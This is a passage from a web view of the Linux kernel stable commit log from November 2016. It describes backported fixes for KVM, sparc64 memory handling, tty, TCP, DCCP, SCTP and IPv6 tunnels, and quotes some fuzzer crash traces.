Commit graph

565571 commits

Author SHA1 Message Date
Ignacio Alvarado
d4a774fdb9 KVM: Disable irq while unregistering user notifier
commit 1650b4ebc99da4c137bfbfc531be4a2405f951dd upstream.

Function user_notifier_unregister should be called only once for each
registered user notifier.

Function kvm_arch_hardware_disable can be executed from an IPI context
which could cause a race condition with a VCPU returning to user mode
and attempting to unregister the notifier.

Signed-off-by: Ignacio Alvarado <ikalvarado@google.com>
Fixes: 18863bdd60 ("KVM: x86 shared msr infrastructure")
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-26 09:54:52 +01:00
Paolo Bonzini
b689e86c9a KVM: x86: fix missed SRCU usage in kvm_lapic_set_vapic_addr
commit 7301d6abaea926d685832f7e1f0c37dd206b01f4 upstream.

Reported by syzkaller:

    [ INFO: suspicious RCU usage. ]
    4.9.0-rc4+ #47 Not tainted
    -------------------------------
    ./include/linux/kvm_host.h:536 suspicious rcu_dereference_check() usage!

    stack backtrace:
    CPU: 1 PID: 6679 Comm: syz-executor Not tainted 4.9.0-rc4+ #47
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
     ffff880039e2f6d0 ffffffff81c2e46b ffff88003e3a5b40 0000000000000000
     0000000000000001 ffffffff83215600 ffff880039e2f700 ffffffff81334ea9
     ffffc9000730b000 0000000000000004 ffff88003c4f8420 ffff88003d3f8000
    Call Trace:
     [<     inline     >] __dump_stack lib/dump_stack.c:15
     [<ffffffff81c2e46b>] dump_stack+0xb3/0x118 lib/dump_stack.c:51
     [<ffffffff81334ea9>] lockdep_rcu_suspicious+0x139/0x180 kernel/locking/lockdep.c:4445
     [<     inline     >] __kvm_memslots include/linux/kvm_host.h:534
     [<     inline     >] kvm_memslots include/linux/kvm_host.h:541
     [<ffffffff8105d6ae>] kvm_gfn_to_hva_cache_init+0xa1e/0xce0 virt/kvm/kvm_main.c:1941
     [<ffffffff8112685d>] kvm_lapic_set_vapic_addr+0xed/0x140 arch/x86/kvm/lapic.c:2217

Reported-by: Dmitry Vyukov <dvyukov@google.com>
Fixes: fda4e2e855
Cc: Andrew Honig <ahonig@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Reviewed-by: David Hildenbrand <david@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-26 09:54:51 +01:00
Yazen Ghannam
aea9d760b8 x86/cpu/AMD: Fix cpu_llc_id for AMD Fam17h systems
commit b0b6e86846093c5f8820386bc01515f857dd8faa upstream.

cpu_llc_id (Last Level Cache ID) derivation on AMD Fam17h has an
underflow bug when extracting the socket_id value. It starts from 0
so subtracting 1 from it will result in an invalid value. This breaks
scheduling topology later on since the cpu_llc_id will be incorrect.

For example, the the cpu_llc_id of the *other* CPU in the loops in
set_cpu_sibling_map() underflows and we're generating the funniest
thread_siblings masks and then when I run 8 threads of nbench, they get
spread around the LLC domains in a very strange pattern which doesn't
give you the normal scheduling spread one would expect for performance.

Other things like EDAC use cpu_llc_id so they will be b0rked too.

So, the APIC ID is preset in APICx020 for bits 3 and above: they contain
the core complex, node and socket IDs.

The LLC is at the core complex level so we can find a unique cpu_llc_id
by right shifting the APICID by 3 because then the least significant bit
will be the Core Complex ID.

Tested-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Yazen Ghannam <Yazen.Ghannam@amd.com>
[ Cleaned up and extended the commit message. ]
Signed-off-by: Borislav Petkov <bp@suse.de>
Acked-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Aravind Gopalakrishnan <aravindksg.lkml@gmail.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Fixes: 3849e91f57 ("x86/AMD: Fix last level cache topology for AMD Fam17h systems")
Link: http://lkml.kernel.org/r/20161108083506.rvqb5h4chrcptj7d@pd.tnic
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-26 09:54:51 +01:00
Greg Kroah-Hartman
4eb9a81002 Linux 4.4.34 2016-11-21 10:06:53 +01:00
David S. Miller
b4bbdcef7d sparc64: Delete now unused user copy fixup functions.
[ Upstream commit 0fd0ff01d4c3c01e7fe69b762ee1a13236639acc ]

Now that all of the user copy routines are converted to return
accurate residual lengths when an exception occurs, we no longer need
the broken fixup routines.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:42 +01:00
David S. Miller
cb85910b0d sparc64: Delete now unused user copy assembler helpers.
[ Upstream commit 614da3d9685b67917cab48c8452fd8bf93de0867 ]

All of __ret{,l}_mone{_asi,_fp,_asi_fpu} are now unused.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:42 +01:00
David S. Miller
1c7e17b1c4 sparc64: Convert U3copy_{from,to}_user to accurate exception reporting.
[ Upstream commit ee841d0aff649164080e445e84885015958d8ff4 ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:42 +01:00
David S. Miller
7181969338 sparc64: Convert NG2copy_{from,to}_user to accurate exception reporting.
[ Upstream commit e93704e4464fdc191f73fce35129c18de2ebf95d ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:42 +01:00
David S. Miller
bfc8be6593 sparc64: Convert NGcopy_{from,to}_user to accurate exception reporting.
[ Upstream commit 7ae3aaf53f1695877ccd5ebbc49ea65991e41f1e ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
dc3a7a7d2c sparc64: Convert NG4copy_{from,to}_user to accurate exception reporting.
[ Upstream commit 95707704800988093a9b9a27e0f2f67f5b4bf2fa ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
1731d90d8a sparc64: Convert U1copy_{from,to}_user to accurate exception reporting.
[ Upstream commit cb736fdbb208eb3420f1a2eb2bfc024a6e9dcada ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
8a444c770f sparc64: Convert GENcopy_{from,to}_user to accurate exception reporting.
[ Upstream commit d0796b555ba60c22eb41ae39a8362156cb08eee9 ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
c718e917b3 sparc64: Convert copy_in_user to accurate exception reporting.
[ Upstream commit 0096ac9f47b1a2e851b3165d44065d18e5f13d58 ]

Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
dd8a78b2b6 sparc64: Prepare to move to more saner user copy exception handling.
[ Upstream commit 83a17d2661674d8c198adc0e183418f72aabab79 ]

The fixup helper function mechanism for handling user copy fault
handling is not %100 accurrate, and can never be made so.

We are going to transition the code to return the running return
return length, which is always kept track in one or more registers
of each of these routines.

In order to convert them one by one, we have to allow the existing
behavior to continue functioning.

Therefore make all the copy code that wants the fixup helper to be
used return negative one.

After all of the user copy routines have been converted, this logic
and the fixup helpers themselves can be removed completely.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
756723ad55 sparc64: Delete __ret_efault.
[ Upstream commit aa95ce361ed95c72ac42dcb315166bce5cf1a014 ]

It is completely unused.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
f5a69ff748 sparc64: Handle extremely large kernel TLB range flushes more gracefully.
[ Upstream commit a74ad5e660a9ee1d071665e7e8ad822784a2dc7f ]

When the vmalloc area gets fragmented, and because the firmware
mapping area sits between where modules live and the vmalloc area, we
can sometimes receive requests for enormous kernel TLB range flushes.

When this happens the cpu just spins flushing billions of pages and
this triggers the NMI watchdog and other problems.

We took care of this on the TSB side by doing a linear scan of the
table once we pass a certain threshold.

Do something similar for the TLB flush, however we are limited by
the TLB flush facilities provided by the different chip variants.

First of all we use an (mostly arbitrary) cut-off of 256K which is
about 32 pages.  This can be tuned in the future.

The huge range code path for each chip works as follows:

1) On spitfire we flush all non-locked TLB entries using diagnostic
   acceses.

2) On cheetah we use the "flush all" TLB flush.

3) On sun4v/hypervisor we do a TLB context flush on context 0, which
   unlike previous chips does not remove "permanent" or locked
   entries.

We could probably do something better on spitfire, such as limiting
the flush to kernel TLB entries or even doing range comparisons.
However that probably isn't worth it since those chips are old and
the TLB only had 64 entries.

Reported-by: James Clarke <jrtc27@jrtc27.com>
Tested-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
d36a1ac49d sparc64: Fix illegal relative branches in hypervisor patched TLB cross-call code.
[ Upstream commit a236441bb69723032db94128761a469030c3fe6d ]

Just like the non-cross-call TLB flush handlers, the cross-call ones need
to avoid doing PC-relative branches outside of their code blocks.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
5d8eb95476 sparc64: Fix instruction count in comment for __hypervisor_flush_tlb_pending.
[ Upstream commit 830cda3f9855ff092b0e9610346d110846fc497c ]

Noticed by James Clarke.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
217f829ae9 sparc64: Fix illegal relative branches in hypervisor patched TLB code.
[ Upstream commit b429ae4d5b565a71dfffd759dfcd4f6c093ced94 ]

When we copy code over to patch another piece of code, we can only use
PC-relative branches that target code within that piece of code.

Such PC-relative branches cannot be made to external symbols because
the patch moves the location of the code and thus modifies the
relative address of external symbols.

Use an absolute jmpl to fix this problem.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
David S. Miller
2ba06323db sparc64: Handle extremely large kernel TSB range flushes sanely.
[ Upstream commit 849c498766060a16aad5b0e0d03206726e7d2fa4 ]

If the number of pages we are flushing is more than twice the number
of entries in the TSB, just scan the TSB table for matches rather
than probing each and every page in the range.

Based upon a patch and report by James Clarke.

Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
James Clarke
7593180073 sparc: Handle negative offsets in arch_jump_label_transform
[ Upstream commit 9d9fa230206a3aea6ef451646c97122f04777983 ]

Additionally, if the offset will overflow the immediate for a ba,pt
instruction, fall back on a standard ba to get an extra 3 bits.

Signed-off-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:41 +01:00
Mike Kravetz
8fd11efa21 sparc64 mm: Fix base TSB sizing when hugetlb pages are used
[ Upstream commit af1b1a9b36b8f9d583d4b4f90dd8946ed0cd4bd0 ]

do_sparc64_fault() calculates both the base and huge page RSS sizes and
uses this information in calls to tsb_grow().  The calculation for base
page TSB size is not correct if the task uses hugetlb pages.  hugetlb
pages are not accounted for in RSS, therefore the call to get_mm_rss(mm)
does not include hugetlb pages.  However, the number of pages based on
huge_pte_count (which does include hugetlb pages) is subtracted from
this value.  This will result in an artificially small and often negative
RSS calculation.  The base TSB size is then often set to max_tsb_size
as the passed RSS is unsigned, so a negative value looks really big.

THP pages are also accounted for in huge_pte_count, and THP pages are
accounted for in RSS so the calculation in do_sparc64_fault() is correct
if a task only uses THP pages.

A single huge_pte_count is not sufficient for TSB sizing if both hugetlb
and THP pages can be used.  Instead of a single counter, use two:  one
for hugetlb and one for THP.

Signed-off-by: Mike Kravetz <mike.kravetz@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Dan Carpenter
4e90b68801 sparc: serial: sunhv: fix a double lock bug
[ Upstream commit 344e3c7734d5090b148c19ac6539b8947fed6767 ]

We accidentally take the "port->lock" twice in a row.  This old code
was supposed to be deleted.

Fixes: e58e241c17 ('sparc: serial: Clean up the locking for -rt')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
David S. Miller
a395f7a66e sparc: Don't leak context bits into thread->fault_address
[ Upstream commit 4f6deb8cbab532a8d7250bc09234c1795ecb5e2c ]

On pre-Niagara systems, we fetch the fault address on data TLB
exceptions from the TLB_TAG_ACCESS register.  But this register also
contains the context ID assosciated with the fault in the low 13 bits
of the register value.

This propagates into current_thread_info()->fault_address and can
cause trouble later on.

So clear the low 13-bits out of the TLB_TAG_ACCESS value in the cases
where it matters.

Reported-by: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Peter Hurley
4e772c53ab tty: Prevent ldisc drivers from re-using stale tty fields
commit dd42bf1197144ede075a9d4793123f7689e164bc upstream.

Line discipline drivers may mistakenly misuse ldisc-related fields
when initializing. For example, a failure to initialize tty->receive_room
in the N_GIGASET_M101 line discipline was recently found and fixed [1].
Now, the N_X25 line discipline has been discovered accessing the previous
line discipline's already-freed private data [2].

Harden the ldisc interface against misuse by initializing revelant
tty fields before instancing the new line discipline.

[1]
    commit fd98e9419d
    Author: Tilman Schmidt <tilman@imap.cc>
    Date:   Tue Jul 14 00:37:13 2015 +0200

    isdn/gigaset: reset tty->receive_room when attaching ser_gigaset

[2] Report from Sasha Levin <sasha.levin@oracle.com>
    [  634.336761] ==================================================================
    [  634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr ffff8800a743efd0
    [  634.339558] Read of size 4 by task syzkaller_execu/8981
    [  634.340359] =============================================================================
    [  634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected
    ...
    [  634.405018] Call Trace:
    [  634.405277] dump_stack (lib/dump_stack.c:52)
    [  634.405775] print_trailer (mm/slub.c:655)
    [  634.406361] object_err (mm/slub.c:662)
    [  634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236)
    [  634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279)
    [  634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1))
    [  634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447)
    [  634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567)
    [  634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879)
    [  634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607)
    [  634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613)
    [  634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188)

Cc: Tilman Schmidt <tilman@imap.cc>
Cc: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
Cc: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Eric Dumazet
225a24ae97 tcp: take care of truncations done by sk_filter()
[ Upstream commit ac6e780070e30e4c35bd395acfe9191e6268bdd3 ]

With syzkaller help, Marco Grassi found a bug in TCP stack,
crashing in tcp_collapse()

Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.

We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq

Many thanks to syzkaller team and Marco for giving us a reproducer.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Marco Grassi <marco.gra@gmail.com>
Reported-by: Vladis Dronov <vdronov@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Stephen Suryaputra Lin
ae9e052a58 ipv4: use new_gw for redirect neigh lookup
[ Upstream commit 969447f226b451c453ddc83cac6144eaeac6f2e3 ]

In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().

After commit 5943634fc5 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never gets resolved and the traffic is blackholed.

So, use the new_gw for neigh lookup.

Changes from v1:
 - use __ipv4_neigh_lookup instead (per Eric Dumazet).

Fixes: 5943634fc5 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Eric Dumazet
5c67f9477b net: __skb_flow_dissect() must cap its return value
[ Upstream commit 34fad54c2537f7c99d07375e50cb30aa3c23bd83 ]

After Tom patch, thoff field could point past the end of the buffer,
this could fool some callers.

If an skb was provided, skb->len should be the upper limit.
If not, hlen is supposed to be the upper limit.

Fixes: a6e544b0a8 ("flow_dissector: Jump to exit code in __skb_flow_dissect")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Yibin Yang <yibyang@cisco.com
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Acked-by: Willem de Bruijn <willemb@google.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Soheil Hassas Yeganeh
b67ed647d1 sock: fix sendmmsg for partial sendmsg
[ Upstream commit 3023898b7d4aac65987bd2f485cc22390aae6f78 ]

Do not send the next message in sendmmsg for partial sendmsg
invocations.

sendmmsg assumes that it can continue sending the next message
when the return value of the individual sendmsg invocations
is positive. It results in corrupting the data for TCP,
SCTP, and UNIX streams.

For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream
of "aefgh" if the first sendmsg invocation sends only the first
byte while the second sendmsg goes through.

Datagram sockets either send the entire datagram or fail, so
this patch affects only sockets of type SOCK_STREAM and
SOCK_SEQPACKET.

Fixes: 228e548e60 ("net: Add sendmmsg socket system call")
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Alexander Duyck
0650eeb4f1 fib_trie: Correct /proc/net/route off by one error
[ Upstream commit fd0285a39b1cb496f60210a9a00ad33a815603e7 ]

The display of /proc/net/route has had a couple issues due to the fact that
when I originally rewrote most of fib_trie I made it so that the iterator
was tracking the next value to use instead of the current.

In addition it had an off by 1 error where I was tracking the first piece
of data as position 0, even though in reality that belonged to the
SEQ_START_TOKEN.

This patch updates the code so the iterator tracks the last reported
position and key instead of the next expected position and key.  In
addition it shifts things so that all of the leaves start at 1 instead of
trying to report leaves starting with offset 0 as being valid.  With these
two issues addressed this should resolve any off by one errors that were
present in the display of /proc/net/route.

Fixes: 25b97c016b ("ipv4: off-by-one in continuation handling in /proc/net/route")
Cc: Andy Whitcroft <apw@canonical.com>
Reported-by: Jason Baron <jbaron@akamai.com>
Tested-by: Jason Baron <jbaron@akamai.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Marcelo Ricardo Leitner
3f8857a497 sctp: assign assoc_id earlier in __sctp_connect
[ Upstream commit 7233bc84a3aeda835d334499dc00448373caf5c0 ]

sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread release it. But Andrey
Konovalov and Dmitry Vyukov reported an use-after-free in such
situation.

Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.

Fix is, instead of doing the read after waiting for the connect, do it
before so, and avoid this issue as the socket is still locked by then.
There should be no issue on returning the asoc id in case of failure as
the application shouldn't trust on that number in such situations
anyway.

This issue doesn't exist in sctp_sendmsg() path.

Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Eric Dumazet
65d29c1856 ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped
[ Upstream commit 990ff4d84408fc55942ca6644f67e361737b3d8e ]

While fuzzing kernel with syzkaller, Andrey reported a nasty crash
in inet6_bind() caused by DCCP lacking a required method.

Fixes: ab1e0a13d7 ("[SOCK] proto: Add hashinfo member to struct proto")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:40 +01:00
Eric Dumazet
99131760a8 ipv6: dccp: fix out of bound access in dccp_v6_err()
[ Upstream commit 1aa9d1a0e7eefcc61696e147d123453fc0016005 ]

dccp_v6_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Eric Dumazet
a2df29ed84 dccp: fix out of bound access in dccp_v4_err()
[ Upstream commit 6706a97fec963d6cb3f7fc2978ec1427b4651214 ]

dccp_v4_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.

This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Eric Dumazet
ad6d0a8201 dccp: do not send reset to already closed sockets
[ Upstream commit 346da62cc186c4b4b1ac59f87f4482b47a047388 ]

Andrey reported following warning while fuzzing with syzkaller

WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
 ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
 ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
 0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
 [<     inline     >] __dump_stack lib/dump_stack.c:15
 [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
 [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
 [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
 [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
 [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
 [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
 [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
 [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
 [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
 [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
 [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
 [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
 [<     inline     >] exit_task_work include/linux/task_work.h:21
 [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
 [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
 [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
 [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
 [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130
arch/x86/entry/common.c:156
 [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
 [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0
arch/x86/entry/common.c:259
 [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
   (ftrace buffer empty)
Kernel Offset: disabled

Fix this the same way we did for TCP in commit 565b7b2d2e
("tcp: do not send reset to already closed sockets")

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Eric Dumazet
69a5c7ca2e tcp: fix potential memory corruption
[ Upstream commit ac9e70b17ecd7c6e933ff2eaf7ab37429e71bf4d ]

Imagine initial value of max_skb_frags is 17, and last
skb in write queue has 15 frags.

Then max_skb_frags is lowered to 14 or smaller value.

tcp_sendmsg() will then be allowed to add additional page frags
and eventually go past MAX_SKB_FRAGS, overflowing struct
skb_shared_info.

Fixes: 5f74f82ea34c ("net:Add sysctl_max_skb_frags")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Hans Westgaard Ry <hans.westgaard.ry@oracle.com>
Cc: Håkon Bugge <haakon.bugge@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-11-21 10:06:39 +01:00
Eli Cooper
8777977b22 ip6_tunnel: Clear IP6CB in ip6tunnel_xmit()
[ Upstream commit 23f4ffedb7d751c7e298732ba91ca75d224bc1a6 ]

skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.

This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.

